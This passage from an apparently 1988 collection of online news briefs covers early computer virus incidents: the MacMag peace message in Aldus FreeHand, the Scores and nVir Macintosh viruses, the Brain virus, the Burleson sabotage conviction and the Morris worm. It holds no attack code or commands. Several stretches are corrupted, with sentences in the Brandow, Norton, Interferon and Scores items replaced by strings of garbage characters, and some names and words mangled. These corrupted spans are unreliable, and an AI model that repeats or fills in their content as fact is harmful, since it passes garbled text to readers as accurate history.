instance of a so-called "virus" infecting commercial +software. + Tibbits says the Brandow virus apparently inadvertently spread to the Aldus +program through a Chicago subcontractor called MacroMind Inc. + MacroMind President Marc Canter told AP that the virus appears to have been in +software he obtained from Brandow which included a game program called "Mr. +Potato Head," a version of the popular toy. + Canter said that, unaware of the digital infection, he ran the game program +once, then later used the same computer to work on a disk to teach Mac owners +how to use FreeHand. That disk, eventually sent to Aldus, became infected. Then +it inadvertently was copied onto disks sold to customers and infected their +computers, Canter said. + Upset with Brandow, Canter says he also is considering legal action. For his +part, Brandow says he met Canter, but denied giving him the software. + The whole incident apparently has some at other companies worried because they +also use Canter's services. Tibbits says that among MacroMind's clients are +Microsoft, Ashton-Tate, Lotus Development Corp. and Apple Computers. A-T has not +commented, but officials at Microsoft, Apple and Lotus all told AP that none of +their software was infected. + Ma!while, Brandow told Tibbits that, besides calling for world peace, the +virus message was meant to discourage software piracy and to encourage computer +users to buy original copies. + The full message read: "Richard Brandow, the publisher of MacMag, and its +entire staff would like to take tZl.Htuniy o convey their universal +message of peace to all Macintosh users around the world." Beneath that was a +picture of a globe. + +BranKw`XZсzɥB*ѕjѡɥ镑́z5RɅ́zjձ +́Jjɕearea and possibly +a few other areas of Canada and the United States. However, he said he was +shocked later to find that, after the virus program began to appear in the +databases of online information services, an estimated 350,000 people in North +America and Europe saw the message pop up on their computers on March 2. + --Charles Bowen + + +THREAT OF "VIRUS" BLOWN OUT OF PROPORTION, NORTON AND SYSOPS SAY + + (April 10) + The threat of so-called computer "viruses" has been vastly overrated, +according to software guru Petr2Norton and two CompuServe forum administrators. + "We're dealing with an urban myth," Norton told Insight magazine. "It's like +the story of alligators in the sewers of New York. Everyone knows about them, +but no one's ever seen them. Typically, these stories come up(wery three to +five years." + Don Watkins, administrator of CompuServe's IBM Users Network forums (GO +IBMNET) also told the general interest magazine that he's more concerned about +being hit by a meteor than a computer virus. + "In five years," Watson said, "I've seen only one program that was designed to +do intentional damage. That was about three yeaW`֋ +Jс͹5Rѥѕj +@""I@have never spoken to anyone who personally, firsthand, has ever seen or +experienced a program like this," Watson added, "and my job keeps me itouchM +Źźͅzj$ ComuS˹W2յadministrators check each piece of user-contributed software +before posting it in data libraries for general distribution. + The alleged virus problem received widespread attention in early March when an +unauthorized message was placed onto Freehand, a commercial software product for +the Apple Macintosh published by Aldus Corp. Earlier, the same message +circulated in several information services and was uploaded to CompuServe's +Hyper Forum, a forum devoted to the Hypertext technology that is part of the +Micronetworked Apple Users Groups (GO MAUG). + The message read "Richard Brandow, publisher of MacMag, would like to take +this opportunity to convey a universal message of peace to all Macintosh users." +It then erased itself without doing any harm. + Of the situation, Neil Shapiro, MAUG's chief sysop, said, "The whole problem +has been completely hyped out of proportion." + --Daniel Janal + + +COMPUTER VIRUS NEWSLETTER DEBUTS + + (April 13) + If you want to follow all the latest news on insipid computer viruses, you +might be interested in the debut of "Computer Virology," a newsletter devoted to +identifying and analyzing those annoying computer diseases. + Produced by Director Technologies Inc., the developers of Disk Defender, a +hardware device that write protects PC hard disks, the newsletter will be +published monthly. Topics will include developments for protection against the +viruses, precautions and procedures to follow to insure that terrorists not let +loose this rampant epidemic. + "The latest strain of computer viruses presently causing serious damage at +university labs, scientific research facilities, hospitals and business +organizations worldwide, has created a very real concern for the future of +having free access to the tremendous amounts of information that are now readily +available for unlimited use," said Dennis Director, president of Director +Technologies. + "The potential dangers of such viruses is that they can be used not only as a +means to facilitate malicious pranks in the home computer area, but also pose a +real `terrorist' threat to academic computing labs, scientific research projects +and business. Data loss can cost hundreds of thousands of dollars in real money, +as well as in wasted man-hours." + The newsletter is distributed free of charge. For information or to subscribe, +contact Director Technologies Inc., 906 University Pl., Evanston, IL 60201. +312/491-2334. + + +SIR-TECH UNVEILS ANTI-VIRUS + + (April 14) + Sir-tech Software Inc., the Ogdensburg, N.Y., firm best known for its +recreational programs such as the acclaimed "Wizardry" series of adventure +games, now has released a free program called "Interferon, the Magic Bullet" +that it says is meant to "halt the devastation of computer virus." + A company statement reports that Robert Woodhead, 29-year-old director of +Sir-tech's Ithaca, N.Y., development center, designed the Apple Macintosh +program to "detect and destroy the highly-publicized computer virus which +threatens the integrity of the world's computer systems." + Sir-tech says the program will be offered free for downloading from related +services o QompuServe and GEnie. In addition, it is available by mailing a +diskette with a self-addressed, stamped envelope to Sir-tech, 10 Spruce Lane, +Ithaca, N.Y. 14850. + While the program itself is free, Woodhead asks for donations to a fund +established to buy computer equipment for visually impaired users. A notice in +the software gives details on the fund. + Woodhead said he has worked since early this year to come up with Interferon, +named for the antiviral treatment for cancer. "Just as a virus leaves clues in a +human body, the computer virus is detectable if users know what to look for," +Woodhead said. + The Inter~on`Ʌ́́сѕɁ͕́j +́5RɕɁJѥ +JѕсɕJ́ѡ +ͱ5Rstatement`XZӷVѥcan be cured by deleting the diseased files," it +added. "As new viruses are discovered, Interferon will be updated for instant +detection." + --Charles Bowen + + + +NEW VIRUS PLAGUES MACINTOSHES AT NASA AND APPLE + + (April 18) + Apple Macintosh computers at the National Aeronautics and Space Administration +and at Apple Computer as well as other business offices around the country have +caught a new computer virus, reports0Nwsdayn +@"Thebѕсhigh-tech plague is under investigation by Apple and federal +autGities. + During the past three weeks, Apple has been receiving reports of a virus +called Scores. Although it has not been known to erase any data, it can cause +malfunctions in printing and accessing files and can cause system crashes, +Cynthia Macon of Apple Computer told Newsday. + Two hundred of the 400 Macintosh computers at the Washington, D.C. offices of +NASA have been infected. Many of them are connected to local area networks and +are spreading the virus. "This particular virus does not attack data. We have +no record indicating anyone lost anything important," said Charles Redmond, a +NASA spokesman. + Newsday notes that the Scores virus can be detected by the altered symbols +that appear in Scrapbook and Note Pad, two Macintosh files. Instead of the Mac +logo, users see a symbol that looks like a dog-eared piece of paper. Two days +after the virus is transmitted, it is activated and begins to randomly infect +applications, such as word processing and spreadsheet programs. + EDS Corp. of Dallas, Texas was also infected with the Scores virus, but +managed to stop its spread. + -- Cathryn Conroy + + + +FRIDAY THE 13TH "VIRUS" FIZZLES + + (May 14) + Good morning, computerdom! It's Saturday the 14th and we're all still here. At +least, we all SEEM to still be here, though some are saying it's too early to +tell for sure. + Yesterday, the first Friday the 13th of the year, was widely reported to be +the target date for the denotation of a computer virus called "Black Friday" +which was first discovered in the computers of the Hebrew University in +Jerusalem late last year. The virus, which was reported to have spread from +Jerusalem to computers around the world, was said to be designed to destroy +computer files on May 13. + However, no early reports of damage have surfaced. Computer experts in +Jerusalem told Associated Press writer Karin Laub that the so-called virus was +undone because most computer users were alerted in time. Hebrew University +researchers detected the virus on Dec. 24 because of a flaw in its design, +according to senior programmer Yisrael Radai. + Nonetheless, a few experts are saying that we aren't out of the woods yet. + For instance, Donn Parker of the SRI International research firm in Menlo +Park, Calif., told The Washington Post this morning that he hadn't heard of any +virus-related damage, "but we have been holding our breath. I think it will be a +dud, but we won't know until next week, and only then if people whose computers +go down talk about it." + Some software companies tackled the virus scare. AP reports that the Iris +software publisher of Tel Aviv developed an anti-virus program for the Israeli +computing community and sold 4,000 copies before yesterday. President Ofer +Ahituv estimated that 30 percent of his 6,000 customers, most of them +businesses, had been infected by the Black Friday virus. + Meanwhile, some are saying the apparent fizzle of the virus is what they +expected all along. + "Viruses are like the bogyman," said Byron C. Howes, a computer systems +manager at the University of North Carolina at Chapel Hill. Speaking with AP, he +compared programmers who believe in viruses to "people who set little bowls of +milk outside our doors to feed the dwarfs." + Barry B. Cooper, owner of Commercial Software in Raleigh, N.C., agreed. "I +just think that the whole thing is a joke," like the prediction by medieval seer +Nostradamus of a major earthquake on May 8, 1988. "That didn't come true, and +this won't come true." + --Charles Bowen + + +R.I. NEWSPAPER DISLODGES VIRUS + + (May 16) + The Providence, R.I., Journal-Bulletin says it worked for the past week and a +half to stamp out a "virus" that infected an in-house personal computer network +used by reporters and editors, but not before the virus destroyed one reporter's +data and infected scores of floppy disks. + Writing in The Journal, Jeffrey L. Hiday said the virus was "a well-known, +highly sophisticated variation called the 'brain' virus, which was created by +two brothers who run a computer store in Lahore, Pakistan." + Variations of the virus, he noted, have been discovered at companies and +colleges across the country, including, last week, Bowie State College in +Maryland, where it destroyed five students' disks. Online Today reported on +April 23 that a similar Pakistan-based virus infected a student system used at +Miami University in Ohio, threatening to wipe out term papers stored there. + Apparently this is the first time a virus has invaded a US newspaper's system. + Hiday said The Journal contacted one of the Pakistan brothers by phone, who +said he created this particular virus merely to keep track of software he wrote +and sold, adding that he did not know how it got to the United States. + However, Hiday added, "US computer programming experts ... believe the +Pakistanis developed the virus with malicious intent. The original version may +be relatively harmless, they point out, but its elegance lends itself to +alterations by other programmers that would make it more destructive." + The newspaper says it discovered the virus on May 6 when a message popped up +on computer screens reading, "Welcome to the Dungeon. ... Beware of this VIRUS. +Contact us for vaccination." The message included a 1986 copyright date, two +names (Basit and Amjad), a company (Brain Computer Services), an address (730 +Nizam Block Allama Iqbal in Lahore, Pakistan) and three phone numbers. + Journal-Bulletin systems engineer Peter Scheidler told Hiday, "I was sort of +shocked. I never thought I'd see a virus. That's something you read about." + The virus infected only the PC network; neither the paper's Atex news-editing +system nor its IBM mainframe that supports other departments were affected. + Hiday says the newspaper now is taking steps to protect itself against another +virus attacks. It has tightened dissemination of new software and discussed +installing "anti-virus" devices. In addition, computer users have been warned +not to use "foreign" software, and reporters have been instructed to turn their +computers off and then on again before inserting floppy disks. + --Charles Bowen + + +EPA MACINTOSHES RECOVER FROM VIRUS + + (May 18) + Although Apple Macintosh computers at the Environmental Protection Agency were +recently plagued with a virus, all of them seem to be on the mend now. + According to Government Computer News, the computers were vaccinated with +Virus Rx, a free program issued by Apple Computer Inc. to help users determine +if their hard disks have been infected. Apple has begun an educational campaign +to promote "safe computing practices," Apple spokeswoman Cynthia Macon told GCN. + Virus Rx is available on CompuServe in the Apple Developers Forum (GO APPDEV) +in Data Library 8 under the name VIRUS.SIT. + Macon said the best long-term response to viruses "is to make users aware of +steps they can take to protect themselves." These include backing up data files, +knowing the source of programs and write-protecting master disks. Other steps +include booting from a floppy disk and running all programs from floppies rather +than installing and running them from the hard disk. + EPA is having some trouble with reinfection. Since up to 20 people may use one +Macintosh, someone may unknowingly insert a virus-plagued disk into a clean +machine. "It's like mono. You just never get rid of it," said Leslie Blumenthal, +a Unisys Corp. contract employee at EPA. + FBI agents in Washington, D.C. and San Jose, Calif. are investigating the +spread of the Macintosh virus, notes GCN. + -- Cathryn Conroy + + +CONGRESS CONSIDERS VIRUS PROBLEMS + + (May 19) + Computer viruses have come to the attention of Congress and legislators would +like to be assured that US defense computers are safe from the replicating +little bugs. Although defense systems can't be reached simply by telephoning +them, a virus could be contracted through an infected disk containing +non-essential information. + The Defense Authorization Bill for FY 1989 is likely to direct the Defense +Department (DoD) to report on its methods for handling potential viral +infections. Congress also wants to know what DoD has done about safeguarding +military computers. They'd like some assurance that the Defense Department also +has considered situations where a primary contractor's computer could be +infected and subsequently endanger DoD's own computers. + Anticipating future hearings, Congressional staffers are soliciting comments +from knowledgeable users as to what the report to Congress should cover. +Interested parties should forward their comments to Mr. Herb Lin, House Armed +Services Committee, 2120 Rayburn House Office Building, Washington DC 20515. +Further information is available by calling 202/225-7740. All comments will be +kept in confidence. + --James Moran + + +TEXAN STANDS TRIAL FOR ALLEGEDLY INFECTING SYSTEM WITH "VIRUS" + + (May 24) + In Fort Worth, Texas, a 39-year-old programmer is to stand trial July 11 on +felony charges that he intentionally infected an ex-employer's system with a +computer "virus." If convicted, he faces up to 10 years in prison. + The man, Donald Gene Burleson, apparently will be the first person ever tried +under the state's tougher computer sabotage law, which took effect Sept. 1, +1985. + Dan Malone of the Dallas Morning News broke the story this morning, reporting +on indictments that accuse Burleson of executing programs "designed to interfere +with the normal use of the computer" and of acts "that resulted in records being +deleted" from the systems of USPA and IRA Co., a Fort Worth-based national +securities and brokerage. + The paper quoted police as saying the electronic interference was a "massive +deletion" of more than 168,000 records of sales commissions for employees of the +company, where Burleson once worked as a computer security officer. + Burleson currently is free on a $3,000 bonding pending the trial. + Davis McCown, chief of the Tarrant County district attorney's economic crimes +division, said of the alleged virus, "You can see it, but you can't see what it +does -- just like a human virus. It had the ability to multiply and move around +and was designed to change its name so it wouldn't be detected." + McCown also told Malone he wanted to make sure "that this type of criminal +understands that we have the ability to make these type of cases; that it's not +so sophisticated or complicated that it's above the law." + Company officials first noticed a problem on Sept. 21, 1985. Says the Dallas +newspaper, "Further investigation revealed that an intruder had entered the +building at night and used a 'back-door password' to gain access to the +computer. ... Once inside, the saboteur covered his tracks by erasing computer +logs that would have followed his activity, police said. With his access to the +computer complete, the intruder manually deleted the records." + Authorities say that only a few of the 200 workers in the USPA home office -- +including Burleson -- had access and the knowledge needed to sabotage the +system. + Earlier USPA was awarded $12,000 by a jury in a civil lawsuit filed against +Burleson. + --Charles Bowen + + +FBI CALLED TO PROBE VIRUS CASE + + (July 4) + The FBI has been called in by NASA officials to investigate an alleged +computer virus that has destroyed data on its personal computers and those of +several other government agencies. + The New York Times reported this morning that the rogue program -- apparently +the so- called "Scores" virus that surfaced last April -- was designed to +sabotage data at Dallas' Electronic Data Systems. The paper said the virus did +little damage to the Texas company but did wreak havoc on thousands of PCs +nationwide. + The Times quoted NASA officials as saying the FBI was called in because, even +though damage to government data was limited, files were destroyed, projects +delayed and hundreds of hours were spent tracking the culprit at various +government agencies, including NASA, the Environmental Protection Agency, the +National Oceanic and Atmospheric Administration and the US Sentencing +Commission. + NASA says it doesn't know how the program, which damaged files from January to +May, spread from the Texas EDS firm to PC networks nor whether the virus was +deliberately or accidentally introduced at government agencies. + Meanwhile, the Times quoted experts as saying that at least 40 so-called +"viruses" now have been identified in the United States, defining a virus as a +program that conceals its presence on a disk and replicates itself repeatedly +onto other disks and into the memory of computers. + As reported here in April, the Scores virus was blamed for infecting hundreds +of Apple Macintosh computers at NASA and other facilities in Washington, +Maryland and Florida. + The Times says the spread of the virus was exacerbated when private +contractors in Washington and North Carolina inadvertently sold dozens of +computers carrying the virus to government agencies. The virus spread for as +long as two months and infected networks of personal computers before it was +discovered. + --Charles Bowen + + + +NEW MEXICO BBS SUES OVER VIRUS + + (Aug. 17) + The operator of a New Mexico computer bulletin board system has filed what may +be the first federal suit against a person accused of uploading a computer +"virus." + William A. Christison, sysop of the Santa Fe Message BBS, alleges in his suit +that a man named Michael Dagg visited his board in the early hours of last May 4 +and "knowingly and intentionally" uploaded a digitally-infected file called +"BBSMON.COM." + The suit says Christison "checked the program before releasing it to the +public and discovered that it was a 'Trojan Horse'; i.e., it appeared to be a +normal program but it contained hidden commands which caused the program to +vandalize Plaintiff's system, erasing the operating system and damaging the file +allocation tables, making the files and programs stored in the computer +unusable." + Christison says that the defendant re-visited the BBS nine times between May 5 +and May 12, sometimes logging in under a pseudonym. "Several of these times," +the suit says, "he sent in messages and on May 7, 1988, he knowingly and +intentionally sent in by modem a program of the same name, BBSMON.COM, as the +original 'Trojan Horse' computer program." + Through attorney Ann Yalman, Christison asks the court to grant $1,000 for +each Trojan Horse violation and to enjoin the defendant "from sending 'Trojan +Horses' or 'viruses' or other vandalizing programs to Plaintiff or anyone else." + A copy of the Santa Fe Message's suit has been uploaded to CompuServe's IBM +Communications Forum. To see it, visit the forum by entering GO IBMCOM at any +prompt. The ASCII file is VIRUS.CHG in forum library 0. + Also, you can reach Christison BBS directly with a modem call to 505/988-5867. + --Charles Bowen + + + +VIRUS FIGHTERS FIGHT EACH OTHER + + (Aug. 31) + Two groups that mean to protect us in the fight against so-called computer +"viruses" seem to be spending rather a lot of their energies fighting each +other. + "I personally know most of the people in this industry and I have never seen +this kind of animosity," Brian Camenker of the Boston Computer Society tells +business writer Peter Coy. + The bickering grew louder on Monday in page-one article in MIS Week trade +newspaper in which each side accused the other of using sloppy techniques and +manipulating the testing process for its own purposes. + Says Coy, "The intensity of the debate has left some software developers +disgusted with the whole business." + The argument, which centers around fair evaluation anti-virus "vaccine" +software, pits the 2- month-old Computer Virus Industry Association led by John +McAfee, president of InterPath Corp. of Santa Clara, Calif., against what Coy +terms "a loose collection of other computer experts" led by consultant Jon R. +David of Tappan and editor Harold Highland of Computers & Security magazine. + "Customers and producers agree on the need for an independent panel of experts +to review the (vaccine) software," Coy comments. "The question splitting the +industry is who should be in charge." + CVIA is pulling together an independent university testing panel made up of +representatives of Pace University, Adelphi University and Sarah Lawrence +College and headed by John Cordani, who teaches computer science at Adelphi and +Pace. However, David and Highland say these people don't have the necessary +credentials and that McAfee's InterPath products will have an advantage in the +testing because McAfee invented a virus simulator that will be used as a testing +mechanism. + Meanwhile, Highland says he's getting funding from his publisher, Elsevier +Advanced Technology Publications, for his own review of anti-viral software, but +adds he isn't interested in operating an ongoing review board. + --Charles Bowen + + + +VIRUS TRIAL BEGINS IN FORT WORTH + + (Sept. 7) + A 40-year-old Texas programmer has gone on trial this week, accused of using a +"virus" to sabotage thousands of computer records at his former employer's +business. + If convicted in what is believed to be the nation's first virus-related +criminal trial, Donald G. Burleson faces up to 10 years in jail and a $5,000 +fine. + Reporting from the state criminal district court in Fort Worth, Texas, The +Associated Press notes Burleson was indicted on charges of burglary and harmful +access to a computer in connection with damage to data at USPA & IRA Co. +securities firm two days after he was fired. The trial is expected to last about +two weeks. + USPA, which earlier was awarded $12,000 in a civil suit against Burleson, +alleges the defendant went into its offices one night and planted a virus in its +computer records that, says AP, "would wipe out sales commissions records every +month. The virus was discovered two days later, after it had eliminated 168,000 +records." + --Charles Bowen + + +VIRUS ATTACKS JAPANESE NETWORK + + (Sept. 14) + Japan's largest computer network -- NEC Corp.'s 45,000- subscriber PC-VAN +service -- has been infected by a computer "virus." + McGraw-Hill News quotes a NEC spokesman as saying that over the past two weeks +13 different PC- VAN users have reported virus incidents. + Subscribers' user IDs and passwords "were apparently stolen by the virus +planter when the members accessed one of the service's electronic bulletin +boards," MH says. "The intruder then used the information to access other +services of the system and charged the access fees to the password holders." + NEC, which says it has not yet been able to identify the virus planter, gave +the 13 subscribers new user IDs and passwords to check the proliferation of the +virus. + --Charles Bowen + + +JURY CONVICTS PROGRAMMER OF VIRUS + + (Sept. 20) + After deliberating six hours, a Fort Worth, Texas, jury late yesterday +convicted a 40-year-old programmer of planting a "virus" to wipe out 168,000 +computer records in revenge for being fired by an insurance firm. + Donald Gene Burleson is believed to be the first person convicted under +Texas's 3-year-old computer sabotage law. The trial, which started Sept. 6, also +was among the first of its kind in the nation, Judge John Bradshaw told the +Tarrant County jury after receiving its verdict. + The Associated Press says jurors now are to return to State District Court to +determine the sentence. + Burleson, an Irving, Texas, resident, was found guilty of harmful access to a +computer, a third-degree felony with a maximum penalty of 10 years in prison and +a $5,000 fine. However, as a first-time offender, Burleson also is eligible for +probation. + As reported here earlier, Burleson was alleged to have planted a rogue program +in computers used to store records at USPA and IRA Co., a Fort Worth insurance +and brokerage firm. + During the trial, prosecutor Davis McCown told the jury the virus was +programmed like a time bomb and was activated Sept. 21, 1985, two days after +Burleson was fired as a programmer at the firm because of alleged personality +conflicts with other employees. + AP quoted McCown as saying, "There were a series of programs built into the +system as early as Labor Day (1985). Once he got fired, those programs went +off." + McCown added the virus was discovered two days later after it had eliminated +168,000 payroll records, holding up paychecks to employees for more than a +month. + Expert witnesses also testified in the three-week trial that the virus was +entered in the system via Burleson's terminal by someone who used Burleson's +personal access code. + However, the defense said Burleson was set up by someone else using his +terminal and code. Says AP, "Burleson's attorneys attempted to prove he was +vacationing in another part of the state with his son on the dates in early +September when the rogue programs were entered into the system. But prosecutors +presented records showing that Burleson was at work and his son was attending +school on those dates." + The Fort Worth Star-Telegram reports that also during the trial, Duane Benson, +a USPA & IRA senior programmer analyst, testified the automated virus series, +which was designed to repeat itself periodically until it destroyed all the +records in the system, never was automatically activated. Instead, Benson said, +someone manually set one of the programs in motion Sept. 21, 1985, deleting the +records, then covering his or her tracks by deleting the program. + Prosecutor McCown says data damage in the system could have amounted to +hundreds of thousands of dollars had the virus continued undetected. + As reported here earlier, Burleson also has lost a civil case to USPA in +connection with the incident. That jury ordered him to pay his former employers +$12,000. + Following the yesterday's verdict, McCown told Star-Telegram reporter Martha +Deller, "This proves (virus damage) is not an unprosecutable offense. It may be +hard to put a case together, but it's not impossible." + --Charles Bowen + + +UNIVERSITY PROFESSORS ATTACK COMPUTER VIRUSES + + (Sept. 30) + Because they have not been given access to the National Security Agency's +anti-virus research, several university- based computer experts are planning to +begin their own testing and validating of software defenses against computer +viruses, reports Government Computer News. + Led by John Cordani, assistant professor of information systems at Adelphi +University, the results will be made public, unlike those being researched by +NSA. The work being done by the Department of Defense is too classified for use +by the general computer community. + GCN notes that computer viruses are hard-to-detect programs that secretly +replicate themselves in computer systems, sometimes causing major damage. + Cordani and five other academics will establish secure laboratories to study +viruses in three New York colleges: Adelphi University, Pace University and +Sarah Lawrence College. The lab will test anti-virus software developed by +companies that are members of the Computer Virus Industry Association, a +consortium of anti-virus defense developers. + The group will then publish what it is calling "consumer reports" in the media +and on electronic bulletin board systems. Once sufficient research is completed, +more general grading systems will be applied, said Cordani. In addition, the lab +will use viruses sent to them by the CVIA to develop classification algorithms +to aid in describing a virus' actions and effects. + -- Cathryn Conroy + + + +SECOND VIRUS FOUND AT ALDUS CORP. + + (Oct. 21) + For the second time this year, a computer "virus" has been found in a +commercial program produced by Seattle's Aldus Corp. The infection was found in +the latest version of the FreeHand drawing software, the same software that was +invaded by a different virus last March. + An Aldus official told The Associated Press the company was able to prevent +the virus's spread to programs for sale to the public, but that an entire +computer network within Aldus' headquarters has been infected. + The virus was found in a version of the Apple Macintosh software that was sent +to specific users to be tested before going to market. One of the testers +discovered the virus, dubbed "nVir," and two days later, Aldus realized the +virus was in its own in-house network. + Said Aldus spokeswoman Jane Dauber, "We don't know where it came from. That is +the nature of the virus. You can't really track it." + AP says Aldus officials said the new virus has remained dormant so far, a tiny +program that merely attaches itself to other programs. + "We don't know why," Dauber said. "We don't know what invokes this virus. With +some of them, you have to launch the program a certain number of times," for the +virus to activate. + The company told the wire service that, while it does not know where the virus +originated, reports are that it apparently has infected at least one +unidentified East Coast university's computers. + Another Aldus spokeswoman, Laury Bryant, added, "You just can't always stop +these things from coming in the door. But what we have done is to set up systems +which eliminate them before they are actually in full version, shrink-wrap +software and stop them from going out the door." + Last March, in what was apparently the first instance of an infection in +commercial software, a virus called the "March 2 peace message" was found in +some FreeHand programs. The invasion caused Aldus to recall or rework thousands +of packages of the new software. + --Charles Bowen + + + +MAN SENTENCED IN NATION'S FIRST VIRUS-RELATED CRIMINAL COURT CASE + + (Oct. 23) + Donald Gene Burleson, the first person ever convicted of using a computer +"virus" to sabotage data, has been sentenced to seven years' probation and +ordered to pay back nearly $12,000 to his former employer. + The 40-year-old Irving, Texas, man's attorney told United Press International +he will appeal the sentenced handed down late Friday by District Judge John +Bradshaw in Fort Worth, Texas. + As reported earlier, Burleson was convicted Sept. 19 of the third-degree +felony, the first conviction under the new Texas state computer sabotage law. He +was accused of infecting the computers of USPA & IRA, a Fort Worth insurance and +securities firm a few days after his firing Sept. 18, 1985. + Burleson could have received two to 10 years in prison and a fine up to $5,000 +under the 1985 law. As a first-time offender, however, he was eligible for +probation. + As reported during last month's trial, a few days after Burleson's firing in +1985, company officials discovered that 168,000 records of sales commissions had +been deleted from their system. + Burleson testified that he was more than 300 miles away from Fort Worth on +Sept. 2 and Sept. 3 when the virus was created. However, UPI notes that evidence +showed that his son was not traveling with him as he said but in school, and +that a credit card receipt Burleson said proved he was in Rusk on Sept. 3 turned +out to be from 1987. + Associated Press writer Mark Godich quoted Burleson's lawyer, Jack Beech, as +saying he had asked for five years' probation for his client, and restitution +not to exceed $2,500. + Godich also observed that the Burleson's conviction and sentencing "could pave +the way for similar prosecutions of people who use viruses." + Chairman John McAfee of the Computer Virus Industry Association in Santa, +Clara, Calif., told AP the Texas case was precedent-setting and that it's rare +that people who spread computer viruses are caught. He added his organization +had documented about 250,000 cases of sabotage by computer virus. + --Charles Bowen + + +BRAIN VIRUS HITS HONG KONG + + (Oct. 30) + According to Computing Australia, a major financial operation in Hong Kong was +infected with a version of the "Brain" virus. This is the first reported +infection of a commercial business in the East. + Business International, a major financial consulting firm in Hong Kong, is +believed not to have suffered any major damage. A company spokeswoman played +down the appearance of the virus and said that no data had been lost. + The "brain" virus has been reported as a highly sophisticated piece of +programming that was created by two men in Lahore, Pakistan who run the Brain +Computer Services company. It's last reported appearance in the US was during +May when it popped up at the Providence, R.I., Journal- Bulletin newspaper. + --James Moran + + +60 COMPUTER FIRMS SET VIRUS GOALS + + (Nov. 2) + Some 60 computer companies have organized a group to set guidelines that they +say should increase reliability of computers and protect the systems from +so-called "viruses." + The Reuter Financial News Service says that among firms taking part in the +movement are Microsoft Corp., 3Com Inc., Banyan Systems and Novell Inc. At the +same time, though, declining to join the efforts are such big guys as IBM and +Digital Equipment Corp. + Reuter reports, "The companies said the measures would promote competition +while allowing them to cooperate in making computers more reliable and less +vulnerable to viruses." + However, the firms apparently have shied away from specific proposals, instead +issuing broad recommendations that leave it up to each company to develop the +technology needed to prevent the spread of viruses, Reuter said. + --Charles Bowen + + +THOUSANDS OF UNIVERSITY, RESEARCH COMPUTERS STUCK IN MAJOR ASSAULT + + (Nov. 4) + Thousands of Unix-based computers at universities and research and military +installations were slowed or shut down throughout the day yesterday as a rogue +program ripped through international networks, an incident proclaimed by some to +be the largest assault ever on the nation's computers. + No permanent damage or security breaches appear to have occurred during the +attack. This led some to say this morning that the intrusion was not actually a +computer "virus" but rather was a "worm" program, in that it apparently was +designed to reproduce itself, but not to destroy data. + Science writer Celia Hooper of United Press International says the virus/worm +penetrated the computers through a "security hole" in debugging software for +electronic mail systems that connect Unix-based computers, evidently then moving +primarily through ARPAnet (the Advanced Research Projects Agency Network) and +NSFnet (network of the National Science Foundation) that link 2,000 computers +worldwide. + At other systems: + -:- The virus/worm also apparently invaded the Science Internet network that +serves many labs, including NASA's Jet Propulsion Laboratory in Pasadena, Calif. + -:- NASA spokesman Charles Redmond said there were no reports of the space +agency's network, Space Physics Analysis Network (SPAN), being affected by the +attack, but he added that SPAN was linked to some of the infected networks. + Meanwhile, The New York Times this morning reported an anonymous call from a +person who said his associate was responsible for the attack and that the +perpetrator had meant it to be harmless. + The caller told the newspaper that his associate was a graduate student who +made a programing error in designing the virus, causing the intruder to +replicate much faster than expected. Said The Times, "The student realized his +error shortly after letting the program loose and ... was now terrified of the +consequences." + UPI's Hooper says the virus/worm intrusion was detected about 9 p.m. Eastern +Time Wednesday at San Francisco's Lawrence Livermore National Laboratory, one of +two such labs where nuclear weapons are designed. Spokeswoman Bonnie Jean +Barringer told UPI said the invasion "was detected and contained within two +hours." + The rogue program evidently spread through a flaw in the e- mail system of the +networks. Hooper said it quickly penetrated Air Force systems at the NASA Ames +Research Center in Mountain View, Calif., and systems at the Massachusetts +Institute of Technology, the University of California at Berkeley, the +University of Wisconsin, the University of Chicago, the University of Michigan, +the University of Rochester, the University of Illinois and Rutgers, Boston, +Stanford, Harvard, Princeton, Columbia, Cornell and Purdue universities. + Charley Kline, senior research programmer with the Computing Services Office +at the University of Illinois at Urbana-Champaign, Ill., told Associated Press +writer Bernard Schoenburg, "This is the first time that I know of that (a virus +infection) has happened on this scale to larger systems." + Kline agreed the virus traveled between computer systems through e-mail and, +once the messages were received, they linked up to command controls and told the +local computers to make copies of the virus. Kline said the copies then sought +out other connected devices. + He also said that as far as he knows, only locations using Digital Equipment +Corp.'s VAX computers or those systems made by Sun Microsystems Inc. were +affected. He estimated about 75 percent of all national networks use such +systems. + Schoenburg also noted that all the affected computers use the BSD Unix +operating system, written at University of California/Berkeley as a modified +version AT&T's original Unix. + Commenting on the situation, Chairman John McAfee of the new Computer Virus +Industry Association in Santa Clara, Calif., told AP writer Paul A. Driscoll, +"The developer was clearly a very high-order hacker (because) he used a flaw in +the operating systems of these computers." + Research director Todd Nugent of the University of Chicago's computing +department told UPI computer operators across the country were tipped off to the +invasion when they noticed their Unix-based systems running unusually slowly. +Thmlachines turned out to be bogged down by loads of viral programs. Nugent +said that in one machine he had disconnected, the virus appeared to have +replicated itself 85 times. + Today, in the morning-after, systems operators were fighting back on several +fronts: + -:- First, a software "patch" has been developed to fend off the virus/worm. +Spokesman Bill Allen of the University of Illinois at Urbana-Champaign told +UPI's Hooper, "The strategy is to shut off various (infected) computers from the +network then sanitize them, purging the virus with a patch program." Hooper said +the patches, which find and excise the virus/worm from the computer and then +plug the hole through which it entered, now are circulating on campuses and have +been posted nationally on computer bulletin board systems. + -:- Secondly, the Defense Communications Agency has set up an emergency center +to deal with the problem. However, The New York Times noted that no known +criminal investigations are under way. + NSFnet Program Manager Al Thaler told UPI he considered the virus/worm "a +mean-spirited, vicious thing that interferes severely with the communications +network our research computers live in. We are angry." Even though it will be +hard to determine who started the virus/worm, Thaler said, "We are going to +try." + Finally, McAfee of the virus group told AP that this virus/worm was rare +because it infested computers at major institutions, not just personal +computers. "Any hacker in the world can infect personal computers," McAfee said, +"but in this case, the person who did this would have had to have been +physically at the site of one of the computers belonging to the network." He +added, though, that chances of identifying that person were "extremely slim." + --Charles Bowen + + + +REPORTS NAME 23-YEAR-OLD CORNELL STUDENT AS THE AUTHOR OF "VIRUS" + + (Nov. 5) + A 23-year-old Cornell University student and the son of a government computer +security expert now is said to be the person who planted that "virus" that +stymied some 6,000 Unix- based computers across the nation for more than 36 +hours this week. + The New York Times this morning quoted two sources as identifying the suspect +as Robert T. Morris Jr., a computer science graduate student. The paper says +Cornell University authorities found that the young man possessed unauthorized +computer codes. + The young man's father, Robert Morris Sr., the Silver Springs, Md., chief +scientist at the National Computer Security Center in Bethesda, Md., +acknowledged this morning that "it's possible" his son was responsible for the +rapidly-replicating virus that started crashing international networks late +Wednesday night. + However, Morris Sr., who is known for 